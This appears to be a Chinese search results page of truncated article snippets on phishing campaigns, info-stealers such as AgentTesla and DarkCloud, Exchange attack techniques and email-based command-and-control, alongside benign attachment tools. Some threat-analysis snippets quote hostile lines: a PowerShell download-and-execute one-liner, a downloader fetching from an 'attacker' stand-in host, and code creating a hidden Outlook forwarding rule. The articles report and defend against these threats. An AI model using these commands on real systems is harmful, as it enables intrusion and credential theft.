首页
学习
活动
专区
圈层
工具
发布

AgentTesla 掀起攻击全球各地企业的浪潮

电子邮件有一行文字:“Get Outlook for Android”,该文字会根据攻击目标的位置进行本地化。例如 .de 电子邮件地址的受害者会收到德语电子邮件。...【钓鱼邮件】 附件通常是一个 .IMG 或者 .ISO 文件,附件中会包含一个 CHM 文件,名为“草稿合同”。...打开该文件后,会弹出如下的窗口: 【CHM 文件】 该文件包含混淆的 JavaScript 代码,会启动如下所示的 PowerShell 命令来下载最终 Payload: 【PowerShell...代码】 最终的 Payload 伪装成 JPG 文件从看起来合法的网站下载,这也是为了规避检测与分析。...AgentTesla 是窃密软件,可以: 从浏览器、电子邮件客户端、VPN 客户端、FTP 客户端、剪贴板中窃取密码 获取用户按键记录 获取屏幕截图 窃取计算机相关信息 下载其他恶意软件 本次攻击行动的攻击者主要进行窃密

99410

高价值外交目标的定向鱼叉攻击与防御体系构建——以伊朗黑客行动为例

三、攻击链技术还原(一)初始投递:高保真诱饵构造邮件正文包含以下要素以增强可信度:引用真实会议编号(如“GSR-2025-09”);插入受害者本人在上次会议中的照片(从官网下载);声称“附件因安全策略转为在线预览...当用户在Windows系统中打开时,自动触发PowerShell脚本下载:下载的PowerShell脚本(payload.ps1)执行以下操作:枚举本地凭证:搜索Chrome/Firefox保存的密码、SSH私钥(~/.ssh/id_rsa)、PuTTY...日历事件;注册隐蔽转发规则:# PowerShell: 创建隐藏邮件转发规则$rule = New-Object -ComObject Outlook.Rule$rule.Name = "Sync Backup...自动下载外部图片/HTMLSet-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Outlook\Options\Mail" -Name

23110
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    如何使用JavaScript实现在线Excel附件的上传与下载?

    前言 在本地使用Excel时,经常会有需要在Excel中添加一些附件文件的需求,例如在Excel中附带一些Word,CAD图等等。...答案是肯定的,不过和本地不同的是,Web端不会直接打开附件,而是使用超链接单元格的形式来显示,今天小编将为大家介绍使用前端HTML+JS+CSS技术通过超链接单元格的形式实现在线Excel附件上传、下载和修改的操作...使用JS实现附件上传 实现的方式分为四个步骤: 1.创建前端页面 2编写暂存附件信息的方法 3.编写附件文件清除的方法 4.编写文件保存和文件加载的方法 1.创建前端页面 核心代码: 附件会清理掉所有已经上传过的附件信息,打包下载会对所有的附件进行统一下载。...注册的命令主要就是用来做附件文件的下载。

    60110

    Install Office Onlin

    通过安装 Office Online Server 使用户可以在 Exchange Outlook 网页版中查看和编辑受支持的文件附件,而无需先下载这些附件,也无需在本地安装相关程序。...2.安装 Office Online Server 必备组件: 1)下载安装Visual C++ Redistributable for Visual Studio 2015:https://www.microsoft.com...5.打开 Windows PowerShell 并运行以下命令。运行命令时,使用您自己的去替换示例 FQDN 和证书友好名称:   Import-Module OfficeWebApps ?...使用您自己的服务器名称和 URL 替换示例服务器名称和 URL: Set-MailboxServer sen-ex01 –WacDiscoveryEndpoint  “https://oos.sen.hi.cn...接下来,我们来验证一下,Outlook web APP上是否可以查看和编辑: 在没有OOS时,附件只能下载 ,无法查看和编辑: ? 在启用OOS后: ? ? ?

    1.5K20

    新兴威胁——DarkCloud窃取者利用恶意RAR压缩文件攻击金融行业

    该组织的托管检测和响应分析师和威胁猎手发现了以 RAR 文件附件为主要攻击手段的网络钓鱼活动。...脚本启动后,会解码 Base64 编码的 PowerShell 命令,这些命令旨在下载看似无害的 JPG 文件“universe-1733359315202-8750.jpg”(SHA256:89959ad7b1ac18bbd1e850f05ab0b5fce164596bce0f1f8aafb70ebd1bbcf900...该图像包含一个嵌入的 .NET DLL 加载器,隐藏在其数据中,使用 PowerShell 的 [Reflection.Assembly]::Load() 方法提取并部署。...Cyber​​Proof 的遥测数据显示,该恶意软件还试图从 Outlook 和 FTP 客户端窃取更多信息。被盗凭证通过 FTP 和 SMTP 通道泄露,从而扩大了攻击者的操作灵活性。...分析人员建议查找异常脚本执行、使用 [Reflection.Assembly]::Load() 的 PowerShell 活动以及对 Chrome 或 Edge 凭据数据库的未经授权的访问尝试。

    28420

    个人永久性免费-Excel催化剂功能第84波-批量提取OUTLOOK邮件附件

    此篇给大家再次送了批量操作一绝活,批量下载OUTLOOK上的邮件附件。除了批量之外,还让大家见识到科学数据管理的精粹。...如简单的从多封邮件中将其附件下载至指定的文件夹内,这样的需求,依靠现有的邮件客户端工具如OUTLOOK、FOXMAIL是无法完成的。...功能入口 注:此功能仅能在微软的OFFICE套件OUTLOOK上使用,在没有安装OUTLOOK的电脑上不能使用。这也间接体现了OFFICE大家庭的优势,各施其职,同时贯通所有。...使用步骤 若OUTLOOK客户端有多个邮件账户时,需要先登录到指定的需要下载附件的所在帐户,再进行插件的操作。...邮件的保存路径,需要一个空的文件夹,若其内有文件,请先删除或新建或另选文件夹 步骤二:点击【遍历邮件下载附件】按钮,即可开始下载附件 从保存的附件文件夹中,可看到附件已顺利下载成功,并且附件做了重命名操作

    2.4K40

    财务高管定向钓鱼攻击中NetBird恶意软件的传播机制与防御策略研究

    3.2 载荷投递与执行当用户双击恶意文件后,执行流程如下:宏或脚本释放阶段:若为.docm文件,启用宏后执行VBA代码,从远程服务器下载PowerShell脚本。...二次下载:PowerShell脚本通过HTTPS连接至伪装成云存储(如Google Drive、OneDrive)的C2服务器,获取NetBird客户端二进制文件。...4.1 恶意载荷模拟以下为简化版PowerShell下载器(经脱敏处理):# downloader.ps1$uri = "hxxps://storage[.]attacker[.]com/netbird-agent.exe...5.4 管理层:专项培训与演练每季度开展针对高管的钓鱼模拟演练,使用真实招聘场景作为测试用例;建立“双人确认”机制:任何涉及职位申请或外部文件下载的操作需经助理或IT部门二次确认;提供一键上报按钮,高管可即时标记可疑邮件至...结果:对照组:32%用户点击附件,18%完成完整感染链;实验组:0%用户成功执行恶意载荷;98%钓鱼邮件被邮件层拦截;剩余2%在端点层被EDR阻止;平均响应时间:从邮件接收到威胁阻断<30秒;误报率:<

    20610

    年终绩效邮件竟是“毒信”?网络钓鱼正借职场焦虑攻破企业防线

    页面跳转后要求下载一个名为“Performance_Review_2025.xlsx”的Excel文件。...,从远程服务器下载第二阶段载荷(如Cobalt Strike Beacon或AgentTesla窃密木马),并注入内存执行,全程不写入磁盘——即所谓的“无文件攻击”(Fileless Malware)。...更常见的是,在PDF中嵌入诱导性文本:“点击此处下载完整评估表”,实则跳转至恶意网站。...3.3 国内启示:我们并非“免疫区”尽管中国企业在绩效管理上多使用钉钉、企业微信等封闭生态,但芦笛警告:“跨境业务、外企分支机构、留学生归国创业团队等群体,仍高度依赖Gmail、Outlook及国际HR...他还推荐使用沙箱环境打开可疑附件。例如,在Windows Sandbox(Win10/11内置)中运行Excel,即使感染也不会影响主机。

    2100

    ScarCruft针对学术界的鱼叉式钓鱼攻击机制与防御体系研究

    附件形式包括ZIP压缩包内嵌伪装PDF/DOCX,或指向Google Drive、OneDrive等合法云存储的链接,诱导用户下载含恶意宏或外部模板引用的文档。...同时,攻击者使用目标国家本地语言撰写邮件正文,甚至模仿特定学术机构的行文风格,显著提升可信度。...下载第二阶段载荷,常托管于被黑博客或GitHub Gist,进一步混淆来源。...获取用户名、域名、IP、已安装软件列表;文档枚举:遍历%USERPROFILE%\Documents、Desktop及OneDrive同步目录,筛选.docx、.pdf、.xlsx文件;通讯录提取:通过Outlook...4.4 流程层:安全协作规范推广签名邮件:要求涉及敏感内容的通信必须使用S/MIME或PGP签名;专用协作平台:使用经安全加固的SharePoint或Nextcloud替代邮件附件交换;开展专项演练:模拟

    17110

    利用企业邮件系统构造命令控制(C&C)和数据窃取(Exfiltration)通道的思路探讨

    在这里,我们使用PowerShell脚本作为PoC验证。 在我们控制利用的企业用户电子邮箱中,包含可以定期执行我们控制命令的简单PowerShell脚本。...攻击者从互联网登录进入该企业员工被控制利用的Webmail端,并以Powershell方式向其邮箱内自动发送消息邮件的大致方式如下: 该消息邮件被删除之后,进入邮箱垃圾文件夹: 我们植入的恶意程序在内网主机运行之后...: 最终,攻击者只需简单地下载该文件并删除垃圾文件夹内信息,就能以这种“暗度陈仓”的方式实现C&C命令控制和数据窃取(Exfiltration)。...以下为该过程中利用的完整Powershell脚本: 如果目标企业机构使用的是其它架构邮箱系统,如Microsoft (Exchange/Outlook/OWA)等,这其中相关的消息、收件箱...对企业邮箱系统设置双因素认证机制; 监测邮箱内奇怪的附件信息,如PowerShell脚本、加密数据、混淆数据,监测对邮箱的异常访问和操作行为; 企业邮箱系统访问IP限制,如Tor、V**、国家或黑名单等

    2.3K100

    面向首席财务官的伪装招聘钓鱼攻击分析与防御机制研究

    3 攻击手法与技术分析3.1 社会工程策略通过对23起案例的邮件正文、发件人信息及附件命名分析,发现以下共性:发件人伪装:92%的邮件使用与真实猎头公司高度相似的域名(如michaelpage-careers.net...、roberthalf-global.com),或通过Gmail、Outlook等免费邮箱冒充个人猎头顾问。...下载第二阶段载荷,后者为经过混淆的Cobalt Strike Beacon。...对CFO等高权限账户,进一步限制PowerShell执行策略为“Restricted”。进程行为分析:部署EDR代理,监控Office进程是否启动cmd/powershell,或向非常规域名发起连接。...对比传统SEG方案(仅启用SPF+附件类型过滤),本文方案将针对CFO的钓鱼成功率从68%降至3%。6 结论伪装招聘钓鱼攻击利用CFO的职业特性与权限价值,已成为企业财务安全的重大威胁。

    16210

    Exchange漏洞攻略来啦!!

    、日历、任务和联系人等 /powershell 用于服务器管理的 Exchange 管理控制台 /RPC 早期的 Outlook 还使用称为 Outlook Anywhere 的 RPC 交互 注意,...因此,在 ews 接口开放的前提下,可以使用该接口检索通讯录,或下载邮件。使用该接口下载邮件时,还可以不触发 已读/未读 标签变更。...下载后需要进行安装,编译好可在Kali下直接使用的版本下载地址: http://x2100.icecube.wisc.edu/downloads/python/python2.6.Linux-x86_...该工具实现了将获取到的 Net-NTLM 哈希重放到真实 Exchange 服务器的 EWS 接口进行认证,通过 EWS 获取用户邮箱的邮件信息、附件下载、创建转发规则、查询GAL等。...shell(因为只能执行 powershell.exe 而无法传递后面的命令行参数); 用户需要在开启 Outlook 的情况下触发规则条件才有效,在未使用 Outlook 的情况下无法触发动作;但是,

    8.9K20

    你打出去的“客服电话”,正在把黑客请进公司内网——Microsoft Teams通知成新型钓鱼跳板,回拨型攻击席卷全球企业

    这意味着:邮件不会被标记为垃圾;不会触发基于发件人信誉的拦截规则;在Outlook等客户端中显示为“已验证发件人”。攻击者正是看中这一点。...例如:浏览器中已登录的Outlook、SharePoint、OneDrive;Windows凭据管理器中存储的域账号密码;已缓存的Kerberos票据(TGT)。...攻击者甚至会使用数字签名版本(通过盗用或购买开发者证书),进一步规避检测。...以下是一段简化版的PowerShell命令,用于从伪装站点下载并静默执行远程工具:# 伪装为“微软安全更新”$uri = "https://update-microsoft-support[.]xyz/...六、技术破局:从“防邮件”到“控操作”面对回拨型钓鱼,企业需构建三层防御体系:1.

    12610

    再次发现黑客利用新冠疫情实施钓鱼邮件攻击

    黑客以供应商销售部的名义发出钓鱼邮件,附带了包含CVE-2017-11882漏洞利用的Excel文件,以运行从恶意网站下载的木马程序。...当收件人打开邮件附件文档的时候,会触发漏洞利用下载第一阶段攻击载荷,然后通过多次解密后获得并执行第二阶段第三阶段攻击载荷,第三阶段攻击载荷便是WARZONE RAT,最终连接C&C服务端等待指令。...使用CertUtil.exe下载并启动第一阶段攻击载荷1.exe。...另外,CertUtil能够从远程URL下载证书或任何其他文件。 第一阶段攻击载荷 第一阶段攻击载荷是一个C#编写的程序,代码经过高度混淆。...木马传输的数据使用了RC4加密算法加密,密钥为“warzone160": ? 下载并执行文件功能: ? 设置开启远程桌面: ?

    2.2K50

    当议员邮箱成为攻击入口:鱼叉式钓鱼如何悄然渗透国家权力中枢?

    正文提到该议员三天前在议会质询中对《人工智能法案》提出的修正建议,并附上一个名为“AI_Bill_Amendment_Review.pdf”的附件。...几秒后,后台静默运行的恶意宏代码已将他的Outlook会话Cookie上传至境外服务器。攻击者随即登录其企业邮箱,开始翻阅与内阁秘书、外交大臣及智库顾问的往来邮件。...这场无声的渗透战,正将立法机构从“政治舞台”变为“网络前线”。一、从“广撒网”到“精准狙击”:鱼叉式钓鱼的工业化升级传统钓鱼攻击如同撒网捕鱼——发送百万封邮件,期待千分之一的点击率。...PowerShell静默下载并执行Shell "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('" & url...其次,地方人大、政协机关信息化水平参差不齐,部分单位仍在使用弱密码、未启用MFA,甚至通过个人微信处理公务。

    10710

    python自动下载邮件附件

    自16年至今一直从事数据相关工作,从最初的表哥到现在的大数据、数据挖掘、机器学习,一直不断成长!...(自己淘汰自己的路上越走越远o(╥﹏╥)o),于是想着能不能用代码下载,研究了半天还终于整出来了,而且还是两种方法!...charset: value = value.decode(charset) return value def save_att_file(save_path): """附件下载函数...main(yesterday) ​ 三、无授权码的场景 鉴于企业邮箱没有给开授权码权限,以及业务流程限制不允许使用私人邮箱,又研究了下直接使用win32com直接驱动outlook客户端 注:使用前提...(yesterday): # 创建outlook客户端链接 outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace

    2.9K30

    “释放UpCryptor”全球钓鱼行动曝光:一封邮件竟能偷光公司数据?

    但问题出在附件或链接上。表面上是PDF文档或ZIP压缩包,实际上内嵌了恶意脚本。...第二阶段:多层混淆加载下载器从远程服务器获取经过多重混淆的恶意代码,并采用“内存反射加载”技术——即不在硬盘落地,直接在内存中解码并执行,规避传统杀毒软件扫描。...它像一个“全能型间谍”,集成了四大功能:凭据窃取:盗取浏览器保存的密码、Outlook邮箱账号、VPN登录信息;文件打包:扫描本地磁盘,将敏感文档(如合同、设计图、财务报表)压缩打包;横向移动:在内网扫描其他设备...“应严格限制未知来源的脚本执行,尤其是PowerShell连接外网的行为。”芦笛说,“可以通过组策略或EDR工具实现精细管控。”3....凭据最小化 + 短期令牌减少长期有效的静态密码使用,推广短期令牌、单点登录(SSO)和硬件密钥。“即使密码被窃,攻击者也无法长期冒用。”芦笛强调。5.

    14710
    领券